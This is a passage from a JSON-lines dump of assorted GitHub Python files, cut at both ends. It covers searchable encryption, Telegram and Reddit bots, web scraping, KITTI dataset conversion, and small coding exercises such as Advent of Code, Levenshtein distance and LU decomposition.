\n \n %s\n \"\"\" % (javascript,score,result))\n","repo_name":"sv6-UCC/Web_Development_Project","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724800515","text":"import hashlib\n\nfrom pypbc import *\n\nfrom SgxParam import pairing\n\n\ndef Setup(qbits, rbits, nums):\n pubk = [0]\n # 产生一个G_1群的生成元\n n = nums\n g = Element.random(pairing, G1)\n a = Element.random(pairing, Zr)\n for i in range(1, 2 * n + 1):\n # g_i = g ** (a ** i)\n g_i = Element(pairing, G1, value=g ** (a ** i))\n pubk.append(g_i)\n return pairing, g, n, pubk\n\n\ndef Keygen(pairing, g):\n y = Element.random(pairing, Zr)\n # v = g ** y\n v = Element(pairing, G1, value=g ** y)\n pk = v\n msk = y\n keypair = [pk, msk]\n return keypair\n\n\ndef Encrypt(pk, i, N, pairing, g, n, pubk):\n g_1 = pubk[1]\n g_n = pubk[n]\n g_i = pubk[i]\n t = Element.random(pairing, Zr)\n c1 = g ** t\n c2 = (pk * g_i) ** t\n cw_list = []\n for w in N:\n hkp1 = hashlib.sha256(str(w).encode()).hexdigest()\n hash_G_1 = Element.from_hash(pairing, G1, hkp1)\n on = pairing.apply(g, hash_G_1) ** t\n down = pairing.apply(g_1, g_n) ** t\n cw = Element.__ifloordiv__(on, down)\n cw_list.append(cw)\n elements = (c1, c2, cw_list)\n return elements\n\n\ndef Extract(msk, S, pairing, n, pubk):\n kagg = Element.one(pairing, G1)\n for j in S:\n item = n + 1 - j\n element = pubk[item]\n mul = element ** msk\n kagg = kagg * mul\n return kagg\n\n\ndef Trapdoor(kagg, w, pairing):\n hkp1 = hashlib.sha256(str(w).encode()).hexdigest()\n hash_G_1 = Element.from_hash(pairing, G1, hkp1)\n Tr = kagg * hash_G_1\n return Tr\n\n\ndef Adjust(i, S, Tr, pairing, n, pubk):\n mul_all = Element.one(pairing, G1)\n for j in S:\n if j != i:\n item = n + 1 - j + i\n element = pubk[item]\n mul_all = mul_all * element\n Tr_i = Tr * mul_all\n return Tr_i\n\n\ndef Test(Tr_i, i, S, elements, pairing, n, pubk):\n c1 = elements[0]\n c2 = elements[1]\n cws = elements[2]\n pub = Element.one(pairing, G1)\n for j in S:\n item = n + 1 - j\n element = pubk[item]\n pub = pub * element\n on = pairing.apply(Tr_i, c1)\n down = pairing.apply(pub, c2)\n right = Element.__ifloordiv__(on, down)\n for cw in cws:\n if cw == right:\n return True\n return False\n\n\nif __name__ == '__main__':\n qbits = 512\n rbits = 160\n # 签名组id集合\n G = [i for i in range(1, 10 + 1)]\n # 1.Setup():初始化\n pairing, g, n, pubk = Setup(qbits, rbits, len(G))\n print(pairing)\n # 2.DataOwner产生公私钥对\n keypair = Keygen(pairing, g)\n pk = keypair[0]\n msk = keypair[1]\n\n kagg = Extract(msk, G, pairing, n, pubk)\n N = [1, 2, 3, 4, 6]\n # 3.DataOwner根据其关键字和索引加密每个文档\n gid = 1\n encrypt = Encrypt(pk, gid, N, pairing, g, n, pubk)\n\n # 5.用户根据聚合密钥和关键字生成唯一的陷门\n for i in range(len(N)):\n pid = N[i]\n td_i = Trapdoor(kagg, pid, pairing)\n Tri = Adjust(gid, G, td_i, pairing, n, pubk)\n test = Test(Tri, gid, G, encrypt, pairing, n, pubk)\n print(test)\n","repo_name":"UbiPLab/DeTAPS","sub_path":"main/KASE.py","file_name":"KASE.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43462477297","text":"import logging\nimport os\n\nfrom telegram import Update, InlineQueryResultArticle, InputTextMessageContent, \\\n InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import ApplicationBuilder, ContextTypes, CommandHandler, InlineQueryHandler, CallbackQueryHandler\nfrom dotenv import load_dotenv\n\nimport handle_list\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=\"Your name is \" + update.effective_user.first_name + 'If you want to change it, use /name')\n\n\nasync def name_changer(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=\"Your name is \" + update.effective_user.first_name + 'If you want to change it, I don\\'t care! I haven\\'t '\n 'implemented this part yet! XD')\n\n\nasync def inline_query(update: Update, context: ContextTypes.DEFAULT_TYPE):\n query = update.inline_query.query\n response_text = 'کی پایس برای ' + query\n keyboard = InlineKeyboardMarkup([[\n InlineKeyboardButton('پایم', callback_data='opt_in'),\n InlineKeyboardButton('نیستم :(', callback_data='opt_out')\n ]])\n results = [InlineQueryResultArticle(\n id=query,\n title='List for ' + query,\n input_message_content=InputTextMessageContent(response_text),\n reply_markup=keyboard\n )]\n\n await context.bot.answer_inline_query(update.inline_query.id, results)\n\n\nasync def button(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n query = update.callback_query\n option = query.data\n user = query.from_user.username\n logging.info(\"\\n\\n============================\")\n logging.info(query)\n logging.info(update.message)\n logging.info(update)\n logging.info(context.chat_data)\n logging.info(context.user_data)\n logging.info(context.chat_data)\n logging.info(\"============================\\n\\n\")\n\n current_members = handle_list.get_members(query.chat_instance, query.inline_message_id)\n if option == 'opt_in':\n if user in current_members:\n await context.bot.answer_callback_query(query.id, text=\"You\\'re already in!\", show_alert=True)\n return\n else:\n current_members += [user]\n\n else:\n if user not in current_members:\n await context.bot.answer_callback_query(query.id, text=\"You\\'re not even on the list!\", show_alert=True)\n return\n else:\n current_members.remove(user)\n\n handle_list.update_members(query.chat_instance, query.inline_message_id, current_members)\n\n message_text = 'لیست پایه‌ها:'\n for i, name in enumerate(current_members):\n message_text += f'\\n{i}- {name}'\n\n keyboard = InlineKeyboardMarkup([[\n InlineKeyboardButton('پایم', callback_data='opt_in'),\n InlineKeyboardButton('نیستم :(', callback_data='opt_out')\n ]])\n await query.edit_message_text(text=message_text, reply_markup=keyboard)\n\n\ndef setup_handlers():\n return [\n CommandHandler('start', start),\n CommandHandler('name', name_changer),\n CallbackQueryHandler(button),\n InlineQueryHandler(inline_query)\n ]\n\n\nif __name__ == '__main__':\n load_dotenv()\n application = ApplicationBuilder().token(os.getenv('TELEGRAM_BOT_TOKEN')).build()\n\n for handler in setup_handlers():\n application.add_handler(handler)\n\n application.run_polling()\n","repo_name":"SaeeSaadat/telegrambot_name_gatherer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1553931582","text":"from bs4 import BeautifulSoup\nimport requests\nfrom pymongo import MongoClient\n\n# connecting with mongodb\ncluster = MongoClient('your connection string')\n\n# giving cluster name\ndb = cluster[\"localBookData\"]\n\n# giving collection name\ncollection = db[\"allBookDetails\"]\n\ntotal_pages = 50\n\n# titles = ['Title', 'Rating', 'Price', 'Stock']\n\n\ndef individual_product(product_url, row):\n product_html_text = requests.get(f'https://books.toscrape.com/catalogue/{product_url}').content\n product_soup = BeautifulSoup(product_html_text, 'lxml')\n product_data = product_soup.find('article', class_='product_page')\n\n # extracting image url\n raw_img = product_data.find('img')['src']\n raw_img = raw_img.split('/')[2:]\n img = ''\n for char in raw_img:\n img = img + '/' + char\n img = 'https://books.toscrape.com' + img\n\n # extracting title\n title = product_data.find('div', class_='col-sm-6 product_main').h1.text\n\n # extracting price\n price = product_data.find('p',class_='price_color').text\n # print(price)\n\n # extracting rating\n rating = product_data.find('p','star-rating')['class'][1]\n\n # extracting description\n description = product_data.findAll('p')[3].text\n\n # extracting table content\n table = product_data.find('table' , class_='table table-striped').findAll('td')\n upc = table[0].text\n product_type = table[1].text\n price_excl_tax = table[2].text\n price_incl_tax = table[3].text\n tax = table[4].text\n availability = table[5].text\n num_reviews = table[6].text\n\n # print(row, upc, product_type, price_excl_tax, price_incl_tax, tax, availability, num_reviews)\n\n post = {\"_id\": row, \"upc\": upc, \"Title\": title, \"description\": description, \"Rating\": rating[-1], \"price\": price,\n \"stock\": availability, \"product_type\" : product_type, \"price_excl_tax\": price_excl_tax,\n \"price_incl_tax\": price_incl_tax, \"tax\": tax, \"num_reviews\": num_reviews}\n\n collection.insert_one(post)\n print(f'product {row} inserted into database')\n\n\nrow = 1\nfor page in range(total_pages):\n with open(f'./sampleWebpages/page-{page + 1}.html', 'rb') as html_file:\n content = html_file.read()\n\n soup = BeautifulSoup(content,'lxml')\n books_data = soup.findAll('article', class_='product_pod')\n\n\n for book in books_data:\n product_url = book.h3.a['href']\n\n\n # calling function to get individual product details\n individual_product(product_url,row)\n\n # print(product_url)\n row+=1\n print(f\"page number : {page+1} done\")\n\nprint(\"\\nALl Books with details uploaded to the database\")\n\n","repo_name":"Manoj-Kumar13/LearningWebScraping","sub_path":"individualProduct.py","file_name":"individualProduct.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73950346168","text":"import os\nimport cv2\nimport numpy as np\nimport argparse\nimport os.path as osp\nimport shutil\nimport simone_loader\nfrom loader_config import loader_cfg\n\n\nkitti_cls_type = dict( \n Pedestrian = 'Pedestrian',\n Car = 'Car',\n Rider = 'Cyclist',\n TrafficLight = 'Misc',\n Truck ='Truck',\n Bus = 'Van',\n SpecialVehicle = 'Misc',\n SpeedLimitSign = 'Misc',\n RoadObstacle = 'Misc'\n )\n\ndef get_index_str(idx):\n return '{:06d}'.format(idx)\n\ndef convert_rotation_to_kitti(rots):\n return -(rots+3.14/2)\n\ndef get_kitti_format_cls(cls_type):\n if cls_type in kitti_cls_type:\n return kitti_cls_type[cls_type]\n else:\n raise Exception('ERROR: HAS NO CORRESPONDING LABEL')\n\ndef save_kitti_format_label(annos, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n fi = open(path,'w')\n for k in annos:\n bbox2d = annos[k]['bboxes2D']['bbox']\n size = annos[k]['bboxes3D']['size']\n loc = annos[k]['bboxes3D']['relativePos']\n rot = convert_rotation_to_kitti(annos[k]['bboxes3D']['relativeRot'][2])\n cls_type = get_kitti_format_cls(annos[k]['bboxes2D']['type'])\n line = cls_type + ' 0.0 0 {:.2f}'.format(rot)\n line += ' {:.2f} {:.2f} {:.2f} {:.2f}'.format(bbox2d[0], bbox2d[1], bbox2d[2], bbox2d[3])\n line += ' {:.2f} {:.2f} {:.2f}'.format(size[2], size[1], size[0])\n line += ' {:.2f} {:.2f} {:.2f} {:.2f}\\n'.format(-loc[1], -loc[2], loc[0], rot)\n fi.write(line)\n fi.close()\n\ndef save_kitti_format_calib(dump_settings, type_info, idx, file_tail, args):\n fx = dump_settings['camera']['fx']\n fy = dump_settings['camera']['fy']\n cx = dump_settings['camera']['cx']\n cy = dump_settings['camera']['cy']\n p0_line = 'P0: -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n p1_line = 'P1: -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n p2_line = 'P2: {:.2f} 0.0 {:.2f} 0.0 0.0 {:.2f} {:.2f} 0.0 0.0 0.0 1.0 0.0\\n'.format(fx, cx, fy, cy)\n print(p2_line)\n p3_line = '-10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n r0_line = 'R0_rect: 1.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 1.0\\n'\n tr_velo2cam_line = 'Tr_velo_to_cam: 0.0 -1.0 0.0 0.0 0.0 0.0 -1.0 0.0 1.0 0.0 0.0 0.0\\n'\n tr_imu2velo_line = 'Tr_imu_to_velo: 0.0 -1.0 0.0 0.0 0.0 0.0 -1.0 0.0 1.0 0.0 0.0 0.0\\n'\n path = osp.join(args.output, type_info, idx+file_tail)\n fi = open(path, 'w')\n fi.write(p0_line+p1_line+p2_line+p3_line)\n fi.write(r0_line+tr_velo2cam_line+tr_imu2velo_line)\n fi.close()\n\ndef save_kitti_format_pcd(pcd, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n pcd = pcd.reshape(-1)\n pcd.tofile(path)\n\ndef save_kitti_format_image_2(image, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n cv2.imwrite(path, (image*255).astype(np.int32))\n\ndef make_save_dirs(args):\n if not os.path.exists(args.output):\n os.mkdir(args.output)\n path_type = ['image_2', 'label_2', 'velodyne', 'calib']\n for t in path_type:\n path = os.path.join(args.output, t)\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n return\n \ndef gci(dataset_loader, args): \n make_save_dirs(args)\n count = 0\n stamp_num = dataset_loader.get_stamp_num()\n for i in range(stamp_num):\n idx_num = dataset_loader.get_idx_num()\n for j in range(idx_num):\n print(count, i, j)\n data_info = dataset_loader.next()\n idx_str = get_index_str(count)\n save_kitti_format_image_2(data_info['image'], 'image_2', idx_str, '.png', args)\n save_kitti_format_pcd(data_info['pointcloud'], 'velodyne', idx_str, '.bin', args)\n save_kitti_format_calib(data_info['dump_settings'], 'calib', idx_str, '.txt', args)\n save_kitti_format_label(data_info['fusion_annos'], 'label_2', idx_str, '.txt', args)\n count += 1\n return \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n print('Usage: simone2kitti.py --input=inputpath --output=outpath')\n parser.add_argument('--input', default=loader_cfg.DATASET_DIR, required=False,\n help='a path input file')\n parser.add_argument('--output', default='/media/jhli/57DF22050921ED01/exchange/dl_dataset/fusion/temp', required=False,\n help='a path out file')\n args = parser.parse_args()\n dataset_loader = simone_loader.SimoneDatasetLoader(args.input, loader_cfg.TESTING_LOADER_FLAGS, True)\n gci(dataset_loader, args)","repo_name":"51WORLD/SyntheticDataset","sub_path":"user_tools/simone_loader/simone2kitti.py","file_name":"simone2kitti.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"26519353632","text":"from datetime import *\nfrom pytz import *\nfrom telegram import *\nfrom telegram.ext import *\n\nbirthdays = {\n \"26-01\":[\"Jay\", \"Jack\"],\n \"29-06\": [\"Jill\",\"John\"],\n \"06-06\": [\"Sam\", \"Samantha\"]\n}\n\ntoday = datetime.now(timezone('Asia/kolkata'))\ntoday_string = today.strftime(\"%d-%m\")\n\nAPI_Key = \"\"\nCHAT_ID = \"\"\n\nbot = Bot(API_Key)\nupdater = Updater(API_Key, use_context=True)\nupdater.start_polling()\n\nif today_string in birthdays:\n message = \"Birthday Notification\\n\"\n for i in birthdays[today_string]:\n message += i +'\\n'\n print(message)\n bot.send_message(\n chat_id = CHAT_ID,\n text = message\n )\nelse:\n message = \"No birthdays today.\"\n bot.send_message(\n chat_id = CHAT_ID,\n text = message\n )\nupdater.stop()\n","repo_name":"jaygandhi129/PythonTelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28456973969","text":"#!/usr/bin/python\r\n\r\nwith open(\"AOC8.txt\", \"r\") as file:\r\n data = file.read().replace(\"\\n\", \",\")\r\nmylist = data.split(\",\")\r\n\r\ninstruction = []\r\nvalue = []\r\nacc = 0\r\n\r\nfor k in mylist:\r\n\tk = k.split(\" \")\r\n\tinstruction.append(k[0])\r\n\tvalue.append(k[1])\r\n\r\nstep=[]\r\ni=1\r\n\r\nwhile not i in step:\r\n\tstep.append(i)\r\n\tif instruction[i-1] == \"nop\":\r\n\t\ti +=1\r\n\telif instruction[i-1] == \"acc\":\r\n\t\tacc += int(value[i-1])\r\n\t\ti +=1\r\n\telse: \r\n\t\ti += int(value[i-1])\r\n\r\nprint(acc)","repo_name":"neuberpe/AOC2020","sub_path":"AOC8_20.py","file_name":"AOC8_20.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"29393648229","text":"def levenshtein(palabra1, palabra2):\n m = len(palabra1)\n n = len(palabra2)\n\n # Crear una matriz de tamaño (m+1) x (n+1) e inicializar los valores\n matriz = [[0] * (n + 1) for _ in range(m + 1)]\n for i in range(m + 1):\n matriz[i][0] = i\n for j in range(n + 1):\n matriz[0][j] = j\n\n # Calcular la distancia de Levenshtein\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if palabra1[i - 1] == palabra2[j - 1]:\n matriz[i][j] = matriz[i - 1][j - 1]\n else:\n matriz[i][j] = min(matriz[i - 1][j - 1], matriz[i - 1][j], matriz[i][j - 1]) + 1\n\n # Determinar el tipo de distancia y retornar el string correspondiente\n distancia = matriz[m][n]\n if distancia > 1:\n return \"+1\"\n elif distancia == 1:\n if m > n:\n return \"IB\"\n elif m < n:\n return \"IB\"\n else:\n return \"1S\"\n else:\n return \"0D\"\n\nif __name__ == \"__main__\":\n palabra1 = \"gato\"\n palabra2 = \"gatito\"\n resultado = levenshtein(palabra1, palabra2)\n print(resultado)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_0efe3d93feb6175300badf9df4e5b0ac.py","file_name":"tema10_ej2_0efe3d93feb6175300badf9df4e5b0ac.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9908060253","text":"# AUTOSCRIPT NAME: EX2_POSTATUS\n# CREATEDDATE: 2013-10-07 09:45:02\n# CREATEDBY: UFQJ\n# CHANGEDATE: 2014-05-25 19:04:31\n# CHANGEBY: UFQJ\n# SCRIPTLANGUAGE: jython\n# STATUS: Active\n\n# set PO revision date/time based on status change to PROCESSED.\n#\nfrom java.util import Calendar\nfrom java.util import Date\nfrom psdi.mbo import MboConstants\n \nif mbo.getString(\"status\") == \"PROCESSED\":\n # Use the Calendar to get the current Date/Time\n c = Calendar.getInstance()\n c.add(Calendar.SECOND,0)\n\n # now set order date or revision date, depending on whether rev num is zero\n if mbo.getInt(\"revisionnum\") == 0:\n mbo.setValue(\"ORDERDATE\", c.getTime(),MboConstants.NOACCESSCHECK)\n else:\n mbo.setValue(\"EX2POREVDATE\", c.getTime(),MboConstants.NOACCESSCHECK)","repo_name":"git786hub/Dynatrace_python","sub_path":"src/EX2_POSTATUS.py","file_name":"EX2_POSTATUS.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43356851762","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport praw\nimport re\nimport time\nimport os\nimport logging\nimport logging.config\n\n# Logging allows replacing print statements to show more information\n# This config outputs human-readable time, the log level, the log message and the line number this originated from\nlogging.basicConfig(\n format='%(asctime)s (%(levelname)s) %(message)s (Line %(lineno)d)', level=logging.DEBUG)\n\n# PRAW seems to have its own logging which clutters up console output, so this disables everything but Python's logging\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True\n})\n\n\npassmark_page = 'https://www.cpubenchmark.net/cpu_list.php'\ngithub_link = 'https://github.com/Pixxel123/PCSX2-CPU-Bot'\nlatest_build = 'https://buildbot.orphis.net/pcsx2/'\npcsx2_page = 'https://pcsx2.net/getting-started.html'\n\nstr_minimum = 1600\nstr_recommended = 2100\n\nsummon_phrase = 'CPUBot! '\n\n\ndef bot_login():\n logging.info('Authenticating...')\n reddit = praw.Reddit(\n client_id=os.getenv('reddit_client_id'),\n client_secret=os.getenv('reddit_client_secret'),\n password=os.getenv('reddit_password'),\n user_agent=os.getenv('reddit_user_agent'),\n username=os.getenv('reddit_username'))\n logging.info(f\"Authenticated as {reddit.user.me()}\")\n return reddit\n\n\ndef get_cpu_info(cpu_search):\n choices = []\n lookup_page = requests.get(passmark_page)\n html = bs(lookup_page.content, 'lxml')\n cpu_table = html.find('table', id='cputable').find('tbody')\n for row in cpu_table.find_all(\"tr\")[1:]: # skip header row\n cells = row.find_all('td')\n cpu_name = cells[0].text\n cpu_details_link = cells[0].contents[0].attrs['href']\n # ! token_set_ratio ignores word order and duplicated words\n # cpu_name and cpu_search are set to lowercase and whitespace is stripped\n match_criteria = fuzz.token_set_ratio(\n clean_input(cpu_name), clean_input(cpu_search))\n # * show all matching criteria for debugging purposes\n # logging.debug(f\"{cpu_name}: {match_criteria}\")\n if match_criteria >= 50:\n choices.append({'cpu': cpu_name, 'link': cpu_details_link})\n # * show match values for debugging purposes\n # logging.debug(f\"{cpu_name}: {match_criteria}\")\n # score_cutoff value set to lessen false positives\n cpu_closest_match = process.extractOne(\n cpu_search, choices, scorer=fuzz.token_set_ratio, score_cutoff=95)\n cpu_details_link = cpu_closest_match[0]['link']\n cpu_closest_name = cpu_closest_match[0]['cpu']\n # show output in console\n logging.info(f\"Searching for {cpu_search}: Found: {cpu_closest_match}\")\n cpu_details_page = requests.get(\n f\"https://www.cpubenchmark.net/{cpu_details_link.replace('cpu_lookup', 'cpu')}\")\n cpu_page = bs(cpu_details_page.content, 'lxml')\n detail_pane = cpu_page.find('div', class_='right-desc')\n single_thread_rating = detail_pane.find('strong').nextSibling\n # ! cpu_sample_size is not used as it adds no real information to the user, but the scraping for it took some work\n # ! so this is left here for reference.\n # cpu_sample_size = detail_pane.find_all(\n # 'strong')[1].nextSibling.replace('*', '')\n # cpu_error_margin = detail_pane.find_all('span')[2].text\n return (cpu_closest_name, single_thread_rating, cpu_details_page.url)\n\n\ndef clean_input(input_string):\n try:\n # remove CPU frequency value\n frequency_strip = re.search(\n r\"(\\s?@?\\s?)(\\d\\.\\d{1,2})(ghz)?.*$\", input_string, re.IGNORECASE).group(0)\n except AttributeError:\n # if no frequency values to remove, set input to clean_string\n clean_string = input_string\n else:\n clean_string = input_string.split(frequency_strip, 1)[0]\n clean_string = clean_string.lower()\n clean_string = clean_string.replace(' ', '')\n clean_string = clean_string.replace('-', '')\n # * debugging message\n # logging.debug(f\"{input_string} becomes {clean_string}\")\n return clean_string\n\n\ndef bot_message(cpu_lookup):\n try:\n cpu_info = get_cpu_info(cpu_lookup)\n cpu_model = cpu_info[0]\n cpu_str_rating = cpu_info[1]\n # ! cpu_sample_size removed due to not being needed by end user\n # sample_size = cpu_info[2]\n # ! Error margin output removed due to information not being necessary\n # ! CPU page link appended to STR rating\n # error_margin = cpu_info[3]\n details_page = cpu_info[2]\n messages = {'minimum': 'Below minimum specs for PCSX2.',\n 'above_minimum': 'Above minimum specs, but still under the recommended specs for PCSX2.',\n 'recommended': 'At recommended specs for PCSX2.',\n 'above_recommended': 'Above recommended specs for PCSX2.'}\n if int(cpu_str_rating) < str_minimum:\n user_specs = messages['minimum']\n elif str_minimum < int(cpu_str_rating) < str_recommended:\n user_specs = messages['above_minimum']\n elif int(cpu_str_rating) == str_recommended:\n user_specs = messages['recommended']\n elif int(cpu_str_rating) > str_recommended:\n user_specs = messages['above_recommended']\n bot_reply = f\"**CPU model:** {cpu_model}\\n\\n **CPU STR:** [{cpu_str_rating} (CPU Benchmark Page)]({details_page})\\n\\n **PCSX2 specs:** {user_specs}\\n\\n [Single Thread Rating **Minimum:** {str_minimum} | **Recommended:** {str_recommended} (PCSX2 Requirements Page)]({pcsx2_page})\"\n bot_reply += f\"\\n\\n The latest version of PCSX2 can be found [HERE]({latest_build})\"\n except TypeError:\n # reply if CPU information is not found\n bot_reply = f\"Sorry, I couldn't find any information on {cpu_lookup}.\\n\\n If it's not on [PassMark's CPU Benchmarks list]({passmark_page}), I won't be able to return a result; or perhaps you have a misspelling, in which case, feel free to reply to this with `CPUBot! ` and I'll try again!\"\n pass\n bot_reply += f\"\\n\\n---\\n\\n^(I'm a bot, and should only be used for reference (might also make mistakes sometimes, in which case adding a brand name like Intel or AMD could help! I also don't need to know the GHz of your CPU, just the model is enough!)^) ^(if there are any issues, please contact my) ^[Creator](https://www.reddit.com/message/compose/?to=theoriginal123123&subject=/u/PCSX2-CPU-Bot) \\n\\n[^GitHub]({github_link})\"\n return bot_reply\n\n\ndef run_bot():\n try:\n logging.info('Bot started!')\n # look for summon_phrase and reply\n for comment in subreddit.stream.comments():\n # allows bot command to NOT be case-sensitive and ignores comments made by the bot\n if summon_phrase.lower() in comment.body.lower() and comment.author.name != reddit.user.me():\n if not comment.saved:\n # regex allows cpubot to be called in the middle of most sentences\n cpu_lookup = re.search(\n f\"({summon_phrase})([^!,?\\n\\r]*)\", comment.body, re.IGNORECASE)\n if cpu_lookup:\n cpu_lookup = cpu_lookup.group(2)\n comment.reply(bot_message(cpu_lookup))\n comment = reddit.comment(id=f\"{comment.id}\")\n # Note: the Reddit API has a 1000 item limit on viewing things, so after 1000 saves, the ones prior (999 and back) will not be visible,\n # but reddit will still keep them saved.\n # If you are just checking that an item is saved, there is no limit.\n # However, saving an item takes an extra API call which can slow down a high-traffic bot.\n comment.save()\n logging.info('Comment posted!')\n except Exception as error:\n # saves comment where CPU info cannot be found so bot is not triggered again\n comment.save()\n # dealing with low karma posting restriction\n # bot will use rate limit error to decide how long to sleep for\n time_remaining = 15\n error_message = str(error).split()\n if (error_message[0] == 'RATELIMIT:'):\n units = ['minute', 'minutes']\n # split rate limit warning to grab amount of time\n for i in error_message:\n if (i.isdigit()):\n # check if time units are present in string\n for unit in units:\n if unit in error_message:\n # if minutes, convert to seconds for sleep\n time_remaining = int(i) * 60\n else:\n # if seconds, use directly for sleep\n time_remaining = int(i)\n break\n break\n # display error type and string\n logging.exception(repr(error))\n # loops backwards through seconds remaining before retry\n for i in range(time_remaining, 0, -5):\n logging.info(f\"Retrying in {i} seconds...\")\n time.sleep(5)\n\n\nif __name__ == '__main__':\n while True:\n logging.info('Bot starting...')\n try:\n reddit = bot_login()\n # uses environment variable to detect whether in Heroku\n if 'DYNO' in os.environ:\n subreddit = reddit.subreddit('pcsx2')\n else:\n # if working locally, use .env files\n import dotenv\n dotenv.load_dotenv()\n subreddit = reddit.subreddit('cpubottest')\n run_bot()\n except Exception as error:\n logging.exception(repr(error))\n time.sleep(20)\n","repo_name":"Pixxel123/PCSX2-CPU-Bot","sub_path":"cpu_benchmark_scraper.py","file_name":"cpu_benchmark_scraper.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1911464925","text":"#!/usr/bin/env python3\n\"\"\" The file src/listing.txt contains a list of files with one line per file. Each line contains seven fields: access rights, number of references, owner’s name, name of owning group, file size, date, filename. These fields are separated with one or more spaces. Note that there may be spaces also within these seven fields.\n\nWrite function file_listing that loads the file src/listing.txt. It should return a list of tuples (size, month, day, hour, minute, filename). Use regular expressions to do this (either match, search, findall, or finditer method).\n\nAn example: for line\n\n-rw-r--r-- 1 jttoivon hyad-all 25399 Nov 2 21:25 exception_hierarchy.pdf\nthe function should create the tuple (25399, \"Nov\", 2, 21, 25, \"exception_hierarchy.pdf\"). \"\"\"\n\n\nimport re\n\n\n#def file_listing(filename=\"src/listing.txt\"):\ndef file_listing(filename=\"src/listing.txt\"):\n pat3 = \"[\\d]+\\s[A-Z][a-z]+\\s.\\d+\\s\\d+:\\d+\\s[\\w._-]+\"\n resultant = []\n f = open(filename)\n line = f.readline()\n \n while line:\n #print (lyn)\n result = re.findall(pat3,line)\n for word in result:\n L,final = [],[]\n L = word.split()\n\n a,b,c = int(L[0]), L[1], int(L[2])\n time = L[3].split(\":\")\n d,e = int(time[0]), int(time[1])\n final.append(a)\n final.append(b)\n final.append(c)\n final.append(d)\n final.append(e)\n final.append(L[4])\n #print(final)\n resultant.append(final)\n \n line = f.readline()\n f.close()\n return resultant\n \n \n\ndef main():\n filename = \"src/listing.txt\"\n \n print(file_listing(filename))\n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n\"\"\"\n #name = re.findall(r\"([^\\b- ][\\d]+| [A-Z][a-z]+|[aA-zZ]*\\.[a-z]+)\",txt)\n #trial2 = re.findall(r\"([^\\b- :][\\d]+|[A-Z][a-z]+|[aA-zZ]*\\.[a-z]+)\",txt)\n #trial3= re.findall(r\"([^\\b- :][\\d]+|([A-Z][a-z][a-z]| [\\d])+|[a-z_]*\\.[a-z]+)\",txt)\n #listing = (re.findall(r\"([\\d]{2,}|[\\s]+[A-Za-z]+\\.[a-z]+)\",txt))\n \n\"\"\"","repo_name":"vins-stha/hy-data-analysis-with-python","sub_path":"part02-e02_file_listing/src/file_listing.py","file_name":"file_listing.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14705903793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 15:57:07 2018\n\n@author: beccers\n\"\"\"\n\n# Rebecca Olson\n# Homework 7, Problem 3a\n\n# this function inputs an nxn matrix \"Ainput\" and\n# performs LU decomposition, outputing an upper triangular matrix, U, \n# and a lower triangular matrix of the multiplicative factors, L\ndef LUdecomp(Ainput):\n n=len(Ainput)\n U = Ainput.copy() # make copies so as not to write over originals\n L = Ainput.copy() # make copies so as not to write over originals\n for i in range(0, n):\n # loop over row to be zero'ed from row j+1 to n (j+1 to n-1)\n for j in range(i+1, n):\n c = U[j,i]/U[i,i] # multiplicative factor to zero 